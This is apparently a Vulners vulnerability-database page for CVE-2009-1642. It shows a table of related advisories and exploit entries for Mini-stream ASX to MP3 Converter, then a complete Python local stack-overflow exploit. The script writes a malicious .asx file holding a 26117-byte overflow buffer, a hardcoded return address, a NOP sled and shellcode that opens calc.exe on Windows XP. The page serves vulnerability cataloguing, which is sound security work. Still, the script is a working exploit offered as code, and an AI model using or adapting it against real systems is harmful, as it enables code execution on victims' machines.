| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2009-1642 | 7 May 200900:00 | – | circl | |
| CVE-2009-1642 | 15 May 200915:00 | – | cve | |
| CVE-2009-1642 | 15 May 200915:00 | – | cvelist | |
| ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow (PoC) | 29 Mar 201000:00 | – | exploitdb | |
| Shadow Stream Recorder 3.0.1.7 - '.asx' Local Buffer Overflow | 30 Mar 201000:00 | – | exploitdb | |
| Shadow Stream Recorder 3.0.1.7 - Local Buffer Overflow (Metasploit) | 25 Apr 201200:00 | – | exploitdb | |
| Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow | 7 May 200900:00 | – | exploitdb | |
| Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow | 7 May 200900:00 | – | exploitdb | |
| CVE-2009-1642 | 15 May 200915:30 | – | nvd | |
| Mini-Stream Multiple Products Stack Overflow Vulnerability | 26 May 200900:00 | – | openvas |
#!/usr/bin/python
import time
# ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit
# Author: Hazem Mofeed
# PoC: http://www.exploit-db.com/exploits/11930
# Tested On: Windows Xp Home Edition SP3
# Home: http://hakxer.wordpress.com
print ' Exploited by Hazem Mofeed \n'
print ' ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit \n'
print ' building exploit ..........'
time.sleep(3)
shellcode = ("\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65")
ret = "\x08\x6A\x83\x7C"
null = "\x90" * 10
exploit = ("http://" + "\x41" * 26117 + ret + null + shellcode )
try:
file = open("exploit.asx","w")
file.write(exploit)
file.close()
except:
print ' failed 'Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation